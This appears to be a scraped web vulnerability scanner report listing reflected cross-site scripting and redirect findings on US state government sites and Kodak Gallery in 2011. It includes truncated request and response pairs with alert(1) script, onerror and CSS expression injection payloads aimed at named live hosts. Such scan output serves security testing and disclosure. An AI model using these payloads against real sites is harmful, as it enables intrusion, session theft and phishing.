| GET /external/?url=http:/ Host: www.georgia.gov Proxy-Connection: keep-alive Referer: http://ga.gov/00/channel User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:39:55 GMT Server: Apache/1.3.29 (Unix) Expires: Tue, 20 Jun 1995 04:13:09 GMT Set-cookie: JSESSIONID=F468E5F01 Set-Cookie: vgnvisitor=2w45tg008 Content-Type: text/html;charset=UTF-8 Content-Length: 1227 <html> <head> <title>Redirecting...< <link rel="stylesheet" type="text/css" href="/gta/mcm/files/cda <script src="http://www.google ...[SNIP]... </script>1b342e50020" ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.georgia.gov |
| Path: | /external/ |
| GET /external/?url=http:/ Host: www.georgia.gov Proxy-Connection: keep-alive Referer: http://ga.gov/00/channel User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:46:12 GMT Server: Apache/1.3.29 (Unix) Expires: Tue, 20 Jun 1995 04:13:09 GMT Set-cookie: JSESSIONID=1A254C3FA Set-Cookie: vgnvisitor=2w45tw002 Content-Type: text/html;charset=UTF-8 Content-Length: 1175 <html> <head> <title>Redirecting...< <link rel="stylesheet" type="text/css" href="/gta/mcm/files/cda <script src="http://www.google ...[SNIP]... <script type="text/javascript"> location.replace('http:/ </script> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.georgia.gov |
| Path: | /external/ |
| GET /external/?url=http:/ Host: www.georgia.gov Proxy-Connection: keep-alive Referer: http://ga.gov/00/channel User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 00:32:38 GMT Server: Apache/1.3.29 (Unix) Expires: Tue, 20 Jun 1995 04:13:09 GMT Set-cookie: JSESSIONID=941727D8F Set-Cookie: vgnvisitor=2w45tM000 Content-Type: text/html;charset=UTF-8 Content-Length: 1231 <html> <head> <title>Redirecting...< <link rel="stylesheet" type="text/css" href="/gta/mcm/files/cda <script src="http://www.google ...[SNIP]... <meta http-equiv="refresh" content="0; URL=http://georgiawi ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.healthynh.com |
| Path: | /index-fhc.php |
| GET /index-fhc.php?b8336"><script>alert(1)< Host: www.healthynh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 30 Apr 2011 12:38:14 GMT Server: L1c Set-Cookie: PHPSESSID=a3e0be6f57 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 17349 <html> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1" /> <title>Foundation for Healthy Communities</title> <link rel="stylesheet" href="/inc/default.css ...[SNIP]... <a href="/index-fhc.php?b8336"><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.kodakgallery |
| Path: | /gallery/lp/2010/visit |
| GET /gallery/lp/2010/visit Host: www.kodakgallery.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Cache-Control: no-cache, no-store Expires: -1 Set-Cookie: JSESSIONID=C55D22317 Set-Cookie: sourceId=500019816903; Domain=kodakgallery.com; Expires=Mon, 30-May-2011 12:39:19 GMT; Path=/ Set-Cookie: sourceId=null; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: DYN_EMAIL=anon_mem12 Set-Cookie: bookStartTest1=control; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:19 GMT; Path=/ Set-Cookie: bookUnlockedLayoutTest Set-Cookie: ft_80002=none; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:19 GMT; Path=/ Set-Cookie: abTest=bookStartTest1 Content-Type: text/html;charset=ISO Date: Sat, 30 Apr 2011 12:39:19 GMT Server: ecom203 Connection: close Content-Length: 38209 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equ ...[SNIP]... ' } return str.substring(str } /* console.log('getRequ console.log('getQuer console.log('pageName: null'); */ </script> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.ms.gov |
| Path: | /ms_sub_template.jsp |
| GET /ms_sub_template.jsp Host: www.ms.gov Proxy-Connection: keep-alive Referer: http://www.ms.gov/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=0000IR5EH |
| HTTP/1.1 200 OK content-language: en-US content-type: text/html;charset=ISO date: Sat, 30 Apr 2011 01:34:39 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server x-wily-info: Clear guid=A40B0FC60A0C1A1 x-wily-servlet: Encrypt1 eKjr2dtguqhf01QzjJGZ Content-Length: 18892 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title> | The Official State Web Site of Mississippi</title> <link href="ms02.css" rel="stylesheet ...[SNIP]... <img src="images/hdr_46e740"><img src=a onerror=alert(1) ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.nv.gov |
| Path: | /workarea/csslib |
| GET /workarea/csslib Host: www.nv.gov Proxy-Connection: keep-alive Referer: http://www.nv.gov/NV User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ecm=user_id=0&isMemb |
| HTTP/1.1 200 OK Cache-Control: public, max-age=31536000 Content-Type: text/css; charset=utf-8 Expires: Sun, 29 Apr 2012 11:24:54 GMT Last-Modified: Sat, 30 Apr 2011 11:24:54 GMT Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 30 Apr 2011 11:24:53 GMT Content-Length: 11064 .ektronWindow{display ...[SNIP]... Area/images/application /* ######################### /* ektron registered stylesheet: css file not found */ /* id: EktronBubbleCss6bd35<script>alert(1)< /* path: /* ######################### |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.nv.gov |
| Path: | /workarea/java/ektronJs |
| GET /workarea/java/ektronJs Host: www.nv.gov Proxy-Connection: keep-alive Referer: http://www.nv.gov/NV User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ecm=user_id=0&isMemb |
| HTTP/1.1 200 OK Cache-Control: public, max-age=31536000 Content-Type: application/javascript; charset=utf-8 Expires: Sun, 29 Apr 2012 11:24:55 GMT Last-Modified: Sat, 30 Apr 2011 11:24:55 GMT Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 30 Apr 2011 11:24:55 GMT Content-Length: 266 //####################### //ektron registered javascript: js file not found //id: EktronWebToolBarJSdee3d<script>alert(1)< //path: //####################### |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.nysegov.com |
| Path: | /citGuide.cfm |
| GET /citGuide.cfm?superCat Host: www.nysegov.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=101047966 |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 22:50:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en-US"> <head> <title>New York State | Citizen Guide</title> <link rel="STYLESHEET" type ...[SNIP]... <a href="/citGuide.cfm title="Housing" style="font-weight:bold"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.nysegov.com |
| Path: | /citGuide.cfm |
| GET /citGuide.cfm?superCat Host: www.nysegov.com Proxy-Connection: keep-alive Referer: http://ny.gov/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 22:49:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Banner Error Handler Page</title> </head> <body> <table background="http://www ...[SNIP]... <!-- Element 119801f8--><img src=a onerror=alert(1) ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.scsignon.sc |
| Path: | /SCBOS.Core.Framework.Web |
| GET /SCBOS.Core.Framework.Web Host: www.scsignon.sc.gov Connection: keep-alive Referer: https://www.scsignon.sc User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=46765221 |
| HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/javascript; charset=utf-8 Expires: -1 Accept-Ranges: bytes X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=EmulateIE7 Date: Sat, 30 Apr 2011 01:07:29 GMT Content-Length: 217 alert("Could not load resource 'xbrowser.js4bb77<script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://www.sled.state.sc |
| Path: | /sled/default.asp |
| GET /sled/default.asp?b8873<a%20b%3dc Host: www.sled.state.sc.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Connection: close Date: Sat, 30 Apr 2011 12:41:13 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET Content-Length: 779 Content-Type: text/html Set-Cookie: CISESSIONID=9379671b Set-Cookie: ASPSESSIONIDASDSSDTS Cache-control: private <HTML><HEAD><TITLE>SLED Web Site Error Message</TITLE><style type=text/css>FONT {FONT-SIZE: 12px; FONT-FAMILY: Verdana,Helvetica}</style ...[SNIP]... <P>Keyword/name used is: 'b8873<a b=c>fab5232803f'. <p> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.state.mn.us |
| Path: | /portal/mn/jsp/content.do |
| GET /portal/mn/jsp/content.do Host: www.state.mn.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BV_IDS=ccccadfdgilfl |
| HTTP/1.0 200 OK Date: Sat, 30 Apr 2011 12:40:34 GMT Server: Apache Set-cookie: BV_IDS=ccccadfdgilfl Content-Length: 140 Connection: close Content-Type: text/html;charset=utf-8 <SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document </SCRIPT> |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.state.mn.us |
| Path: | /portal/mn/jsp/conte |
| GET /portal/mn/jsp/conte Host: www.state.mn.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BV_IDS=ccccadfdgilfl |
| HTTP/1.0 200 OK Date: Sat, 30 Apr 2011 12:40:34 GMT Server: Apache Set-cookie: BV_IDS=ccccadfdgilfl Content-Length: 135 Connection: close Content-Type: text/html;charset=utf-8 <SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document </SCRIPT> |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.state.mn.us |
| Path: | /portal/mn/jsp/home.do |
| GET /portal/mn/jsp/home.do?9c61e"-alert(1)- Host: www.state.mn.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BV_IDS=ccccadfdgilfl |
| HTTP/1.0 200 OK Date: Sat, 30 Apr 2011 12:40:34 GMT Server: Apache Set-cookie: BV_IDS=ccccadfdgilfl Content-Length: 137 Connection: close Content-Type: text/html;charset=utf-8 <SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document </SCRIPT> |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.state.mn.us |
| Path: | /portal/mn/jsp/hybrid.do |
| GET /portal/mn/jsp/hybrid.do?df818"-alert(1)- Host: www.state.mn.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BV_IDS=ccccadfdgilfl |
| HTTP/1.0 200 OK Date: Sat, 30 Apr 2011 12:40:35 GMT Server: Apache Set-cookie: BV_IDS=ccccadfdgilfl Content-Length: 139 Connection: close Content-Type: text/html;charset=utf-8 <SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document </SCRIPT> |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.state.mn.us |
| Path: | /portal/mn/jsp/logon.do |
| GET /portal/mn/jsp/logon.do?339bf"-alert(1)- Host: www.state.mn.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BV_IDS=ccccadfdgilfl |
| HTTP/1.0 200 OK Date: Sat, 30 Apr 2011 12:40:36 GMT Server: Apache Set-cookie: BV_IDS=ccccadfdgilfl Content-Length: 135 Connection: close Content-Type: text/html;charset=utf-8 <SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document </SCRIPT> |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.state.mn.us |
| Path: | /portal/mn/jsp/redir |
| GET /portal/mn/jsp/redir Host: www.state.mn.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BV_IDS=ccccadfdgilfl |
| HTTP/1.0 200 OK Date: Sat, 30 Apr 2011 12:40:36 GMT Server: Apache Set-cookie: BV_IDS=ccccadfdgilfl Content-Length: 135 Connection: close Content-Type: text/html;charset=utf-8 <SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document </SCRIPT> |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.state.mn.us |
| Path: | /portal/mn/jsp/search.do |
| GET /portal/mn/jsp/search.do?f31e6"-alert(1)- Host: www.state.mn.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BV_IDS=ccccadfdgilfl |
| HTTP/1.0 200 OK Date: Sat, 30 Apr 2011 12:40:37 GMT Server: Apache Set-cookie: BV_IDS=ccccadfdgilfl Content-Length: 135 Connection: close Content-Type: text/html;charset=utf-8 <SCRIPT LANGUAGE="JAVASCRIPT"> setTimeout("document </SCRIPT> |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/leavesite.cfm |
| GET /ada/leavesite.cfm?title Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:05 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <a href="http://www.act.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_eligibility_dsp |
| GET /ada/mn_eligibility_dsp Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:07 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <input type="hidden" name="RAND_prev" value="1688523251d"style="x:expression ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| POST /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf Content-Length: 613 usvuserid=&usvuserid ...[SNIP]... SSAGE_prev=%2520%253Cli |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:02 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: {ts '2011-04-29 17:09:02'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{ ...[SNIP]... <input type="hidden" name="bltextboxextra ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| POST /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf Content-Length: 613 usvuserid=&usvuserid ...[SNIP]... =2&ERRORFIELDS_prev |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:55 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: {ts '2011-04-29 17:08:55'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{ ...[SNIP]... <input type="hidden" name="cftextboxextra ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| GET /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:01 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <input type="hidden" name="ERRORFIELDS_prev" value="usvuseridb6034"style="x:expression ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| POST /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf Content-Length: 613 usvuserid=&usvuserid ...[SNIP]... e%2520fill%2520out |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:08 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: {ts '2011-04-29 17:09:08'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{ ...[SNIP]... <input type="hidden" name="formid" value="108d2b5"style="x:expression ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| POST /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf Content-Length: 613 usvuserid=&usvuserid ...[SNIP]... |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:51 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: {ts '2011-04-29 17:08:51'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{ ...[SNIP]... <input type="hidden" name="formname" value="Form0a32fd"style="x:expression ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| POST /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf Content-Length: 499 library_errormessage= ...[SNIP]... |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:16 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <a href="/ada/mn_forgotpass ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| GET /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf |
